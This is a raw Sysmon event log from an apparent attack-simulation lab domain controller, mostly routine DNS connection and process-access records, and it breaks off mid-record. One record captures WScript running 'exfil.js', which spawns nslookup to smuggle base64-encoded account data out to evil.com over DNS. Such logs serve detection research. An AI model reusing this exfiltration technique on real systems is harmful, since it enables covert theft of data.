354300x8000000000000000198283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.816{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52511- 354300x8000000000000000198282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.815{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52510- 354300x8000000000000000198281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.706{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52509- 354300x8000000000000000198280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.706{00000000-0000-0000-0000-000000000000}4592<unknown process>-udptruefalse127.0.0.1-52509-false127.0.0.1-53domain 354300x8000000000000000198279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.706{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52508- 354300x8000000000000000198278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.706{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52507- 354300x8000000000000000198277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.706{00000000-0000-0000-0000-000000000000}4592<unknown process>-udptruefalse127.0.0.1-52507-false127.0.0.1-53domain 354300x8000000000000000198276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.625{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56350-false10.0.1.12-8000- 354300x8000000000000000198275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.570{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52506- 354300x8000000000000000198274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.457{00000000-0000-0000-0000-000000000000}7836<unknown process>-udpfalsefalse127.0.0.1-52505-false127.0.0.1-53domain 354300x8000000000000000198273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.457{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52505- 354300x8000000000000000198272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.457{00000000-0000-0000-0000-000000000000}7836<unknown process>-udptruefalse127.0.0.1-52505-false127.0.0.1-53domain 354300x8000000000000000198271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.457{00000000-0000-0000-0000-000000000000}7836<unknown process>-udpfalsefalse127.0.0.1-52504-false127.0.0.1-53domain 354300x8000000000000000198270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.457{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52504- 354300x8000000000000000198269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.457{00000000-0000-0000-0000-000000000000}7836<unknown process>-udpfalsefalse127.0.0.1-52503-false127.0.0.1-53domain 354300x8000000000000000198268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.457{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52503- 354300x8000000000000000198267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.456{00000000-0000-0000-0000-000000000000}7836<unknown process>-udptruefalse127.0.0.1-52503-false127.0.0.1-53domain 354300x8000000000000000198266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.314{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52502- 354300x8000000000000000198265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.313{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52501- 354300x8000000000000000198264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.309{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52500- 354300x8000000000000000198263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.309{00000000-0000-0000-0000-000000000000}7704<unknown process>-udptruefalse127.0.0.1-52500-false127.0.0.1-53domain 354300x8000000000000000198262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.165{00000000-0000-0000-0000-000000000000}8<unknown process>-udpfalsefalse127.0.0.1-52499-false127.0.0.1-53domain 354300x8000000000000000198261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.165{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52499- 354300x8000000000000000198260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.165{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52498- 354300x8000000000000000198259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.165{00000000-0000-0000-0000-000000000000}8<unknown process>-udptruefalse127.0.0.1-52498-false127.0.0.1-53domain 354300x8000000000000000198258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.162{00000000-0000-0000-0000-000000000000}8<unknown process>-udpfalsefalse127.0.0.1-52497-false127.0.0.1-53domain 354300x8000000000000000198257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.162{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52497- 354300x8000000000000000198256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.162{00000000-0000-0000-0000-000000000000}8<unknown process>-udptruefalse127.0.0.1-52497-false127.0.0.1-53domain 354300x8000000000000000198255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.981{00000000-0000-0000-0000-000000000000}8064<unknown process>-udpfalsefalse127.0.0.1-52496-false127.0.0.1-53domain 354300x8000000000000000198254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.981{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52496- 354300x8000000000000000198253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.981{00000000-0000-0000-0000-000000000000}8064<unknown process>-udptruefalse127.0.0.1-52496-false127.0.0.1-53domain 354300x8000000000000000198252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.981{00000000-0000-0000-0000-000000000000}8064<unknown process>-udpfalsefalse127.0.0.1-52495-false127.0.0.1-53domain 354300x8000000000000000198251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.981{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52495- 354300x8000000000000000198250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.980{00000000-0000-0000-0000-000000000000}8064<unknown process>-udptruefalse127.0.0.1-52495-false127.0.0.1-53domain 354300x8000000000000000198249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.979{00000000-0000-0000-0000-000000000000}8064<unknown process>-udpfalsefalse127.0.0.1-52494-false127.0.0.1-53domain 354300x8000000000000000198248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.976{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52494- 354300x8000000000000000198247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.976{00000000-0000-0000-0000-000000000000}8064<unknown process>-udptruefalse127.0.0.1-52494-false127.0.0.1-53domain 354300x8000000000000000198246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.826{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52493- 354300x8000000000000000198245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.825{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52492- 354300x8000000000000000198244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.822{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52491- 354300x8000000000000000198243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.661{00000000-0000-0000-0000-000000000000}4996<unknown process>-udpfalsefalse127.0.0.1-52490-false127.0.0.1-53domain 354300x8000000000000000198242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.656{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52490- 354300x8000000000000000198241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.656{00000000-0000-0000-0000-000000000000}4996<unknown process>-udptruefalse127.0.0.1-52490-false127.0.0.1-53domain 354300x8000000000000000198240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.433{00000000-0000-0000-0000-000000000000}7648<unknown process>-udpfalsefalse127.0.0.1-52489-false127.0.0.1-53domain 354300x8000000000000000198239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.433{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52489- 354300x8000000000000000198238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.432{00000000-0000-0000-0000-000000000000}7648<unknown process>-udptruefalse127.0.0.1-52489-false127.0.0.1-53domain 354300x8000000000000000198237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.432{00000000-0000-0000-0000-000000000000}7648<unknown process>-udpfalsefalse127.0.0.1-52488-false127.0.0.1-53domain 354300x8000000000000000198236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.432{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52488- 354300x8000000000000000198235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.432{00000000-0000-0000-0000-000000000000}7648<unknown process>-udptruefalse127.0.0.1-52488-false127.0.0.1-53domain 354300x8000000000000000198234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.432{00000000-0000-0000-0000-000000000000}7648<unknown process>-udpfalsefalse127.0.0.1-52487-false127.0.0.1-53domain 354300x8000000000000000198233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.432{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52487- 354300x8000000000000000198232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.432{00000000-0000-0000-0000-000000000000}7648<unknown process>-udptruefalse127.0.0.1-52487-false127.0.0.1-53domain 354300x8000000000000000198231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.225{00000000-0000-0000-0000-000000000000}5580<unknown process>-udpfalsefalse127.0.0.1-52486-false127.0.0.1-53domain 354300x8000000000000000198230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.225{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52486- 354300x8000000000000000198229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.225{00000000-0000-0000-0000-000000000000}5580<unknown process>-udptruefalse127.0.0.1-52486-false127.0.0.1-53domain 354300x8000000000000000198228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.225{00000000-0000-0000-0000-000000000000}5580<unknown process>-udpfalsefalse127.0.0.1-52485-false127.0.0.1-53domain 354300x8000000000000000198227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.225{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52485- 354300x8000000000000000198226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.225{00000000-0000-0000-0000-000000000000}5580<unknown process>-udptruefalse127.0.0.1-52485-false127.0.0.1-53domain 354300x8000000000000000198225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.092{00000000-0000-0000-0000-000000000000}4004<unknown process>-udptruefalse127.0.0.1-52482-false127.0.0.1-53domain 354300x8000000000000000198224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.932{00000000-0000-0000-0000-000000000000}2604<unknown process>-udpfalsefalse127.0.0.1-52480-false127.0.0.1-53domain 354300x8000000000000000198223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.931{00000000-0000-0000-0000-000000000000}2604<unknown process>-udptruefalse127.0.0.1-52479-false127.0.0.1-53domain 354300x8000000000000000198222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.931{00000000-0000-0000-0000-000000000000}2604<unknown process>-udpfalsefalse127.0.0.1-52478-false127.0.0.1-53domain 354300x8000000000000000198221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.810{00000000-0000-0000-0000-000000000000}1736<unknown process>-udptruefalse127.0.0.1-52477-false127.0.0.1-53domain 10341000x8000000000000000198220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.196{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-913F-000000005F02}5824C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.196{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-913F-000000005F02}5824C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.196{2E1864BB-17B8-629A-913F-000000005F02}58245624C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-903F-000000005F02}5896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.192{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-913F-000000005F02}5824C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.174{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.174{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.174{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.174{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.174{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-903F-000000005F02}5896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.174{2E1864BB-17A1-629A-783D-000000005F02}55527576C:\Windows\System32\WScript.exe{2E1864BB-17B8-629A-903F-000000005F02}5896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.185{2E1864BB-17B8-629A-903F-000000005F02}5896C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcber.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.174{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljbixck.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.158{2E1864BB-17B8-629A-8E3F-000000005F02}73122068C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-8F3F-000000005F02}3976C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 